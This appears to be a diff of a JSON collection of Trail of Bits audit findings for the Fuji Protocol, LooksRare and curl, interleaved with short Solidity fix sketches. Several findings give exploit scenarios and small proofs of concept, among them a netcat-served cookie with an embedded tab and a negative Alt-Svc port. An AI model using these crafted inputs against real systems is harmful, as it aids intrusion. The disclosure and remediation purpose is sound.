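// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract UriSketch {
    // Event signature as defined by EIP-1155.
    event URI(string value, uint256 indexed id);

    string internal _uri;

    function setURI(string memory newUri) public {
        _uri = newUri;
        emit URI(newUri, 0); // id 0 is an illustrative choice here
    }
}
```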
/** * @dev Sets a new URI for all token types, by relying on the token type ID */ function setURI(string memory _newUri) public onlyOwner { _uri = _newUri; } Figure 9.1: FujiERC1155.sol#L266-268 This behavior does not adhere to the EIP-1155 specification, which states the following: Changes to the URI MUST emit the URI event if the change can be expressed with an event (i.e. it isn't dynamic/programmatic). Figure 9.2: A snippet of the EIP-1155 specification Recommendations Short term, revise the setURI function so that it emits the URI event. Long term, review the EIP-1155 specification to verify that the contracts adhere to the standard. References EIP-1155", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "13. Risk of phishing due to data stored in maker order params field ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The MakerOrder struct contains a params field, which holds arbitrary data for each strategy. This storage of data may increase the chance that users could be phished. struct MakerOrder { bool isOrderAsk; // true --> ask / false --> bid address signer; // signer of the maker order address collection; // collection address uint256 price; // price (used as ) uint256 tokenId; // id of the token uint256 amount; // amount of tokens to sell/purchase (must be 1 for ERC721, 1+ for ERC1155) address strategy; // strategy for trade execution (e.g., DutchAuction, StandardSaleForFixedPrice) address currency; // currency (e.g., WETH) uint256 nonce; // order nonce (must be unique unless new maker order is meant to override existing one e.g., lower ask price) uint256 startTime; // startTime in timestamp uint256 endTime; // endTime in timestamp uint256 minPercentageToAsk; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params; // additional parameters uint8 v; // v: parameter (27 or 28) bytes32 r; // r: parameter bytes32 s; // s: parameter } Figure 13.1: The MakerOrder struct in contracts/libraries/OrderTypes.sol#L12-29 In the Dutch auction strategy, the maker params field defines the start price for the auction. When a user generates the signature, the UI must specify the purpose of params . function canExecuteTakerBid (OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { uint256 startPrice = abi.decode(makerAsk.params, ( uint256 )); uint256 endPrice = makerAsk.price; } Figure 13.2: The canExecuteTakerBid function in contracts/executionStrategies/StrategyDutchAuction.sol#L39-L70 When used in a StrategyPrivateSale transaction, the params field holds the buyer address that the private sale is intended for. function canExecuteTakerBid(OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { // Retrieve target buyer address targetBuyer = abi.decode(makerAsk.params, ( address )); return ( ((targetBuyer == takerBid.taker) && (makerAsk.price == takerBid.price) && (makerAsk.tokenId == takerBid.tokenId) && (makerAsk.startTime <= block.timestamp ) && (makerAsk.endTime >= block.timestamp )), makerAsk.tokenId, makerAsk.amount ); } Figure 13.3: The canExecuteTakerBid function in contracts/executionStrategies/StrategyPrivateSale.sol Exploit Scenario Alice receives an EIP-712 signature request through MetaMask.
Because the value is masked in the params field, Alice accidentally signs an incorrect parameter that allows an attacker to match. Recommendations Short term, document the expected values for the params value for all strategies and add in-code documentation to ensure that developers are aware of strategy expectations. Long term, document the risks associated with off-chain signatures and always ensure that users are aware of the risks of signing arbitrary data.", + "title": "10. Partial refinancing operations can break the protocol ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper documents the Controller contract's ability to perform partial refinancing operations. These operations move only a fraction of debt and collateral from one provider to another to prevent unprofitable interest rate slippage. However, the protocol does not correctly support partial refinancing situations in which debt and collateral are spread across multiple providers. For example, payback and withdrawal operations always interact with the current provider, which might not contain enough funds to execute these operations. Additionally, the interest rate indexes are computed only from the debt owed to the current provider, which might not accurately reflect the interest rate across all providers. Exploit Scenario An executor performs a partial refinancing operation. Interest rates are computed incorrectly, resulting in a loss of funds for either the users or the protocol. Recommendations Short term, disable partial refinancing until the protocol supports it in all situations. Long term, ensure that functionality that is not fully supported by the protocol cannot be used by accident.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "14. Use of legacy openssl version in solidity-coverage plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a version of solidity-coverage that relies on a legacy version of openssl to run. While this plugin does not alter protocol contracts deployed to production, the use of outdated security protocols anywhere in the codebase may be risky or prone to errors. Error in plugin solidity-coverage: Error: error:0308010C:digital envelope routines::unsupported Figure 14.1: Error raised by npx hardhat coverage Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies.", + "title": "11. Native support for ether increases the codebase's complexity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The protocol supports ERC20 tokens and Ethereum's native currency, ether. Ether transfers follow different semantics than token transfers. As a result, many functions contain extra code, like the code shown in figure 11.1, to handle ether transfers.
if (vAssets.borrowAsset == ETH) { require(msg.value >= amountToPayback, Errors.VL_AMOUNT_ERROR); if (msg.value > amountToPayback) { IERC20Upgradeable(vAssets.borrowAsset).univTransfer( payable(msg.sender), msg.value - amountToPayback ); } } else { // Check User Allowance require( IERC20Upgradeable(vAssets.borrowAsset).allowance(msg.sender, address(this)) >= amountToPayback, Errors.VL_MISSING_ERC20_ALLOWANCE ); Figure 11.1: FujiVault.sol#L319-333 This extra code increases the codebase's complexity. Furthermore, functions will behave differently depending on their arguments. Recommendations Short term, replace native support for ether with support for ERC20 WETH. This will decrease the complexity of the protocol and the likelihood of bugs.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Undetermined" ] }, { - "title": "15. TypeScript compiler errors during deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "TypeScript throws an error while trying to compile scripts during the deployment process. scripts/helpers/deploy-exchange.ts:29:5 - error TS7053: Element implicitly has an 'any' type because expression of type 'string' can't be used to index type '{ mainnet: string; rinkeby: string; localhost: string; }'. No index signature with a parameter of type 'string' was found on type '{ mainnet: string; rinkeby: string; localhost: string; }'. 29 config.Fee.Standard[activeNetwork] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Figure 15.1: TypeScript error raised by npx hardhat run --network localhost scripts/hardhat/deploy-hardhat.ts In the config.ts file, the config object does not explicitly allow string types to be used as an index type for accessing its keys. Hardhat assigns a string type as the value of activeNetwork . As a result, TypeScript throws a compiler error when it tries to access a member of the config object using the activeNetwork value. Recommendations Short term, add type information to the config object that allows its keys to be accessed using string types. Long term, ensure that TypeScript can compile properly without errors in any and every potential context.", + "title": "12. Missing events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notified about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events.
Long term, use an event monitoring system like Tenderly or Defender, use Defender's automated incident response feature, and develop an incident response plan to follow in case of an emergency. 13. Indexes are not updated before all operations that require up-to-date indexes Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FUJI-013 Target: FujiVault.sol, FujiERC1155.sol, FLiquidator.sol", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, { "title": "14. No protection against missing index updates before operations that depend on up-to-date indexes ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contract's updateF1155Balances function is responsible for updating indexes. This function must be called before all operations that read indexes (TOB-FUJI-013). However, the protocol does not protect against situations in which indexes are not updated before they are read; these situations could result in incorrect accounting. Exploit Scenario Developer Bob adds a new operation that reads indexes, but he forgets to add a call to updateF1155Balances. As a result, the new operation uses outdated index values, which causes incorrect accounting. Recommendations Short term, redesign the index calculations so that they provide protection against the reading of outdated indexes. For example, the index calculation process could keep track of the last index update's block number and access indexes exclusively through a getter, which updates the index automatically if it has not already been updated for the current block. Since ERC-1155's balanceOf and totalSupply functions do not allow side effects, this solution would require the use of different functions internally. Long term, use defensive coding practices to ensure that critical operations are always executed when required.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { "title": "15. Formula for index calculation is unnecessarily complex ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "Indexes are updated within the FujiERC1155 contract's updateState function, shown in figure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee.
} } Figure 15.1: FujiERC1155.sol#L40-57 The code in figure 15.1 translates to the following equation: I_t = I_{t-1} * (1 + (B_t - B_{t-1}) / B_{t-1}). Using the distributive property, we can transform this equation into the following: I_t = I_{t-1} * (1 + B_t / B_{t-1} - B_{t-1} / B_{t-1}). This version can then be simplified: I_t = I_{t-1} * (1 + B_t / B_{t-1} - 1). Finally, we can simplify the equation even further: I_t = I_{t-1} * B_t / B_{t-1}. The resulting equation is simpler and more intuitively conveys the underlying idea: the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the FujiERC1155 contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly. 16. Flasher's initiateFlashloan function does not revert on invalid flashnum values Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-FUJI-016 Target: Flasher.sol", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Undetermined" ] }, { "title": "17. Docstrings do not reflect functions' implementations ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The docstring of the FujiVault contract's withdraw function states the following: * @param _withdrawAmount: amount of collateral to withdraw * otherwise pass -1 to withdraw maximum amount possible of collateral (including safety factors) Figure 17.1: FujiVault.sol#L188-189 However, the maximum amount is withdrawn on any negative value, not only on a value of -1. A similar inconsistency between the docstring and the implementation exists in the FujiVault contract's payback function. Recommendations Short term, adjust the withdraw and payback functions' docstrings or their implementations to make them match. Long term, ensure that docstrings always match the corresponding function's implementation.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Undetermined" ] }, { "title": "18. Harvester's getHarvestTransaction function does not revert on invalid _farmProtocolNum and harvestType values ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The Harvester contract's getHarvestTransaction function incorrectly returns claimedToken and transaction values of 0 if the _farmProtocolNum parameter is set to a value greater than 1 or if the harvestType value is set to a value greater than 2. However, the function does not revert on invalid _farmProtocolNum and harvestType values.
function getHarvestTransaction(uint256 _farmProtocolNum, bytes memory _data) external view override returns (address claimedToken, Transaction memory transaction) { if (_farmProtocolNum == 0) { transaction.to = 0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimComp(address)\")), msg.sender ); claimedToken = 0xc00e94Cb662C3520282E6f5717214004A7f26888; } else if (_farmProtocolNum == 1) { uint256 harvestType = abi.decode(_data, (uint256)); if (harvestType == 0) { // claim (, address[] memory assets) = abi.decode(_data, (uint256, address[])); transaction.to = 0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimRewards(address[],uint256,address)\")), assets, type(uint256).max, msg.sender ); } else if (harvestType == 1) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector(bytes4(keccak256(\"cooldown()\"))); } else if (harvestType == 2) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"redeem(address,uint256)\")), msg.sender, type(uint256).max ); claimedToken = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9; } } } Figure 18.1: Harvester.sol#L13-54 Exploit Scenario Alice, an executor of the Fuji Protocol, calls getHarvestTransaction with the _farmProtocolNum parameter set to 2. As a result, rather than reverting, the function returns claimedToken and transaction values of 0. Recommendations Short term, revise getHarvestTransaction so that it reverts if it is called with invalid _farmProtocolNum or harvestType values. Long term, ensure that all functions revert if they are called with invalid values.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { "title": "19. Lack of data validation in Controller's doRefinancing function ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The Controller contract's doRefinancing function does not check the _newProvider value. Therefore, the function accepts invalid values for the _newProvider parameter. function doRefinancing( address _vaultAddr, address _newProvider, uint256 _ratioA, uint256 _ratioB, uint8 _flashNum ) external isValidVault(_vaultAddr) onlyOwnerOrExecutor { IVault vault = IVault(_vaultAddr); [...] IVault(_vaultAddr).setActiveProvider(_newProvider); } Figure 19.1: Controller.sol#L44-84 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the _newProvider parameter set to the same address as the active provider. As a result, unnecessary flash loan fees will be paid. Recommendations Short term, revise the doRefinancing function so that it reverts if _newProvider is set to the same address as the active provider. Long term, ensure that all functions revert if they are called with invalid values.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, {
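A sketch of the short-term recommendation for the finding above: reject a refinancing call whose target provider is already active (or unset). The IVault interface shown, in particular the activeProvider getter, is an illustrative stand-in for the project's own types:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative stand-in for the project's vault interface.
interface IVault {
    function activeProvider() external view returns (address);
    function setActiveProvider(address provider) external;
}

contract ControllerSketch {
    function doRefinancing(address vaultAddr, address newProvider) external {
        IVault vault = IVault(vaultAddr);
        require(newProvider != address(0), "invalid provider");
        require(newProvider != vault.activeProvider(), "provider already active");
        // ... flash-loan-backed refinancing would follow ...
        vault.setActiveProvider(newProvider);
    }
}
```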
"title": "20. Lack of data validation on function parameters ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "Certain setter functions fail to validate the addresses they receive as input. The following addresses are not validated: The addresses passed to all setters in the FujiAdmin contract The _newFujiAdmin address in the setFujiAdmin function in the Controller and FujiVault contracts The _provider address in the FujiVault.setActiveProvider function The _oracle address in the FujiVault.setOracle function The _providers addresses in the FujiVault.setProviders function The newOwner address in the transferOwnership function in the Claimable and ClaimableUpgradeable contracts Exploit scenario Alice, a member of the Fuji Protocol team, invokes the FujiVault.setOracle function and sets the oracle address as address(0). As a result, code relying on the oracle address is no longer functional. Recommendations Short term, add zero-value or contract existence checks to the functions listed above to ensure that users cannot accidentally set incorrect values, misconfiguring the protocol. Long term, use Slither, which will catch missing zero checks.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, { "title": "13. Indexes are not updated before all operations that require up-to-date indexes ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contract's updateF1155Balances function is responsible for updating indexes. However, this function is not called before all operations that read indexes. As a result, these operations use outdated indexes, which results in incorrect accounting and could make the protocol vulnerable to exploits. FujiVault.deposit calls FujiERC1155._mint, which reads indexes but does not call updateF1155Balances. FujiVault.paybackLiq calls FujiERC1155.balanceOf, which reads indexes but does not call updateF1155Balances.
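One defensive pattern for this finding and TOB-FUJI-014 is to route every index-dependent entry point through a modifier, so that a developer cannot forget the update; a minimal sketch with illustrative names:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract VaultIndexSketch {
    // Every entry point that reads indexes refreshes them first.
    modifier updatesIndexes() {
        _updateF1155Balances();
        _;
    }

    function deposit(uint256 amount) external updatesIndexes {
        // mint/deposit logic that reads indexes runs only after the
        // indexes have been refreshed
    }

    function _updateF1155Balances() internal {
        // query the providers and push fresh balances (and thus fresh
        // indexes) into the FujiERC1155 contract
    }
}
```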
Exploit Scenario The indexes have not been updated in one day. User Bob deposits collateral into the FujiVault. Day-old indexes are used to compute Bob's scaled amount, causing Bob to gain interest for an additional day for free. Recommendations Short term, ensure that all operations that require up-to-date indexes first call updateF1155Balances. Write tests for each function that depends on up-to-date indexes with assertions that fail if indexes are outdated. Long term, redesign the way indexes are accessed and updated such that a developer cannot simply forget to call updateF1155Balances.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Low" ] }, { "title": "16. Flasher's initiateFlashloan function does not revert on invalid flashnum values ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "The Flasher contract's initiateFlashloan function does not initiate a flash loan or perform a refinancing operation if the flashnum parameter is set to a value greater than 2. However, the function does not revert on invalid flashnum values. function initiateFlashloan(FlashLoan.Info calldata info, uint8 _flashnum) external isAuthorized { if (_flashnum == 0) { _initiateAaveFlashLoan(info); } else if (_flashnum == 1) { _initiateDyDxFlashLoan(info); } else if (_flashnum == 2) { _initiateCreamFlashLoan(info); } } Figure 16.1: Flasher.sol#L61-69
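A defensive version of the dispatch in figure 16.1 ends with an explicit revert, so unknown selectors fail loudly; a minimal sketch in which the branch bodies and the error string are illustrative:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract FlasherSketch {
    function initiateFlashloan(bytes calldata info, uint8 flashnum) external {
        if (flashnum == 0) {
            // _initiateAaveFlashLoan(info);
        } else if (flashnum == 1) {
            // _initiateDyDxFlashLoan(info);
        } else if (flashnum == 2) {
            // _initiateCreamFlashLoan(info);
        } else {
            revert("invalid flashnum");
        }
    }
}
```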
Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the flashnum parameter set to 3. As a result, no flash loan is initialized, and no refinancing happens; only the active provider is changed. For example, if a user wants to repay his debt after refinancing, the operation will fail, as no debt is owed to the active provider. Recommendations Short term, revise initiateFlashloan so that it reverts when it is called with an invalid flashnum value. Long term, ensure that all functions revert if they are called with invalid values.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { "title": "21. Solidity compiler optimizations can be problematic ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", "body": "Fuji Protocol has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Fuji Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { "title": "1. Bad recommendation in libcurl cookie documentation ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", "body": "The libcurl documentation recommends that, to enable the cookie store with a blank cookie database, the calling application should use the CURLOPT_COOKIEFILE option with a non-existing file name or a plain blank string (\"\"), as shown in figure 1.1. However, the former recommendation (a non-blank file name with a target that does not exist) can have unexpected results if a file by that name is unexpectedly present. Figure 1.1: The recommendation in libcurl's documentation Exploit Scenario An inexperienced developer uses libcurl in his application, invoking the CURLOPT_COOKIEFILE option and hard-coding a filename that he thinks will never exist (e.g., a long random string), but which could potentially be created on the filesystem. An attacker reverse-engineers his program to determine the filename and path in question, and then uses a separate local file write vulnerability to inject cookies into the application.
Recommendations Short term, remove the reference to a non-existing file name; mention only a blank string. Long term, avoid suggesting tricks such as this in documentation when a misuse or misunderstanding of them could result in side effects of which users may be unaware.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { "title": "2. Libcurl URI parser accepts invalid characters ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", "body": "According to RFC 3986 section 2.2, Reserved Characters, reserved = gen-delims / sub-delims gen-delims = \":\" / \"/\" / \"?\" / \"#\" / \"[\" / \"]\" / \"@\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.1: Reserved characters for URIs. Furthermore, the host field of the URI is defined as follows: host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) ... unreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.2: Valid characters for the URI host field However, cURL does not seem to strictly adhere to this format, as it accepts characters not included in the above. This behavior is present in both libcurl and the cURL binary. For instance, characters from the gen-delims set, and those not in the reg-name set, are accepted: $ curl -g \"http://foo[]bar\" # from gen-delims curl: (6) Could not resolve host: foo[]bar $ curl -g \"http://foo{}bar\" # outside of reg-name curl: (6) Could not resolve host: foo{}bar Figure 2.3: cURL accepting characters that are not valid in the URI host field The exploitability and impact of this issue are not yet well understood; this may be deliberate behavior to account for currently unknown edge cases or legacy support. Recommendations Short term, determine whether these characters are being allowed for compatibility reasons. If so, it is likely that nothing can be done; if not, however, make the URI parser stricter, rejecting characters that cannot appear in a valid URI as defined by RFC 3986. Long term, add fuzz tests for the URI parser that use forbidden or out-of-scope characters.", "labels": [ "Trail of Bits", "Severity: Undetermined", "Difficulty: Low" ] }, { "title": "3. libcurl Alt-Svc parser accepts invalid port numbers ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", "body": "Invalid port numbers in Alt-Svc headers, such as negative numbers, may be accepted by libcurl when presented by an HTTP server. libcurl uses the strtoul function to parse port numbers in Alt-Svc headers. This function will accept and parse negative numbers and represent them as unsigned integers without indicating an error.
For example, when an HTTP server provides an invalid port number of -18446744073709543616, cURL parses the number as 8000: * Using HTTP2, server supports multiplexing * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x12d013600) > GET / HTTP/2 > Host: localhost:2443 > user-agent: curl/7.79.1 > accept: */* > < HTTP/2 200 < server: basic-h2-server/1.0 < content-length: 130 < content-type: application/json * Added alt-svc: localhost: 8000 over h3 < alt-svc: h3=\": -18446744073709543616 \" < Figure 3.1: Example cURL session Exploit Scenario A server operator wishes to target cURL clients and serve them alternative content. The operator includes a specially-crafted, invalid Alt-Svc header on the HTTP server responses, indicating that HTTP/3 is available on port -18446744073709543616 , an invalid, negative port number. When users connect to the HTTP server using standards-compliant HTTP client software, their clients ignore the invalid header. However, when users connect using cURL, it interprets the negative number as an unsigned integer and uses the resulting port number, 8000 , to upgrade the next connection to HTTP/3. The server operator hosts alternative content on this other port. Recommendations Short term, improve parsing and validation of Alt-Svc headers so that invalid port values are rejected. Long term, add fuzz and differential tests to the Alt-Svc parsing code to detect non-standard behavior.", "labels": [ "Trail of Bits", "Severity: Undetermined", "Difficulty: Low" ] }, { "title": "4. Non-constant-time comparison of secrets ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", "body": "Several cases were discovered in which possibly user-supplied values are checked against a known secret using non-constant-time comparison. In cases where an attacker can accurately time how long it takes for the application to fail validation of submitted data that he controls, such behavior could leak information about the secret itself, allowing the attacker to brute-force it in linear time. In the example below, credentials are checked via Curl_safecmp() , which is a memory-safe, but not constant-time, wrapper around strcmp() . This is used to determine whether or not to reuse an existing TLS connection. #ifdef USE_TLS_SRP Curl_safecmp(data->username, needle->username) && Curl_safecmp(data->password, needle->password) && (data->authtype == needle->authtype) && #endif Figure 4.1: lib/url.c, lines 148 through 152. Credentials checked using a memory-safe, but not constant-time, wrapper around strcmp() The above is one example of several such cases found. Exploit Scenario An application uses a libcurl build with TLS-SRP enabled and allows multiple users to make TLS connections to a remote server. An attacker times how quickly cURL responds to his requests to create a connection, and thereby gradually works out the credentials associated with an existing connection. Eventually, he is able to submit a request with exactly the same SSL configuration such that another user's existing connection is reused. Recommendations Short term, introduce a method, e.g. Curl_constcmp() , which does a constant-time comparison of two strings; that is, it scans both strings exactly once in their entirety.
Long term, compare secrets to user-submitted values using only constant-time algorithms.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Tab injection in cookie file ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When libcurl makes an HTTP request, the cookie jar file is overwritten to store the cookies, but the storage format uses tabs to separate key pieces of information. The cookie parsing code for HTTP headers strips the leading and trailing tabs from cookie keys and values, but it does not reject cookies with tabs inside the keys or values. In the snippet of lib/cookie.c below, Curl_cookie_add() parses tab-separated cookie data via strtok_r() and uses a switch-based state machine to interpret specific parts as key information: firstptr = strtok_r(lineptr, \"\\t\", &tok_buf); /* tokenize it on the TAB */ Figure 5.1: Parsing tab-separated cookie data via strtok_r() Exploit Scenario A webpage returns a Set-Cookie header with a tab character in the cookie name. When a cookie file is saved from cURL for this page, the part of the name before the tab is taken as the key, and the part after the tab is taken as the value. The next time the cookie file is loaded, these two values will be used. % echo \"HTTP/1.1 200 OK\\r\\nSet-Cookie: foo\\tbar=\\r\\n\\r\\n\\r\\n\"|nc -l 8000 & % curl -v -c /tmp/cookies.txt http://localhost:8000 * Trying 127.0.0.1:8000... * Connected to localhost (127.0.0.1) port 8000 (#0) > GET / HTTP/1.1 > Host: localhost:8000 > User-Agent: curl/7.79.1 > Accept: */* * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK * Added cookie foo bar=\"\" for domain localhost, path /, expire 0 < Set-Cookie: foo bar= * no chunk, no close, no size. Assume close to signal end Figure 5.2: Sending a cookie with name foo\\tbar and no value % cat /tmp/cookies.txt | tail - localhost FALSE / FALSE 0 foo bar Figure 5.3: The resulting cookie jar entry, with the name split on the tab Recommendations Short term, either reject any cookie with a tab in its key (as \\t is not a valid character for cookie keys, according to the relevant RFC), or escape or quote tab characters that appear in cookie keys. Long term, do not assume that external data will follow the intended specification. Always account for the presence of special characters in such inputs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Standard output/input/error may not be opened ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "The function main_checkfds() is used to ensure that file descriptors 0, 1, and 2 (stdin, stdout, and stderr) are open before curl starts to run. This is necessary to avoid the case wherein, if one of those descriptors is not open initially, the next network socket opened by cURL may gain an FD number of 0, 1, or 2, resulting in what should be local input/output being received from or sent to a network socket instead. However, pipe errors actually result in the same outcome as success: static void main_checkfds(void) { #ifdef HAVE_PIPE int fd[2] = { STDIN_FILENO, STDIN_FILENO }; while(fd[0] == STDIN_FILENO || fd[0] == STDOUT_FILENO || fd[0] == STDERR_FILENO || fd[1] == STDIN_FILENO || fd[1] == STDOUT_FILENO || fd[1] == STDERR_FILENO) if(pipe(fd) < 0) return; /* Out of handles.
This isn't really a big problem now, but will be when we try to create a socket later. */ close(fd[0]); close(fd[1]); #endif } Figure 6.1: tool_main.c, lines 83 through 105 Though the comment notes that an out-of-handles condition would result in a failure later on in the application, there may be cases where this is not true, e.g., the maximum number of handles has been reached at the time of this check, but handles are closed between it and the next attempt to create a socket. In such a case, execution might continue as normal, with stdin/out/err being redirected to an unexpected location. Recommendations Short term, use fcntl() to check if stdin/out/err are open. If they are not, exit the program if the pipe function fails. Long term, do not assume that execution will fail later; fail early in cases like these.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Double free when using HTTP proxy with specific protocols ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Using cURL with a proxy connection and the dict, gopher, LDAP, or telnet protocol triggers a double free vulnerability (figure 7.1). The connect_init function allocates a memory block for an http_connect_state struct (figure 7.2). After the connection, cURL frees the allocated buffer in the conn_free function (figure 7.3); the buffer is then freed a second time in Curl_free_request_state, which uses the Curl_safefree function on elements of the Curl_easy struct (figure 7.4). This double free was not detected in release builds during our testing; the 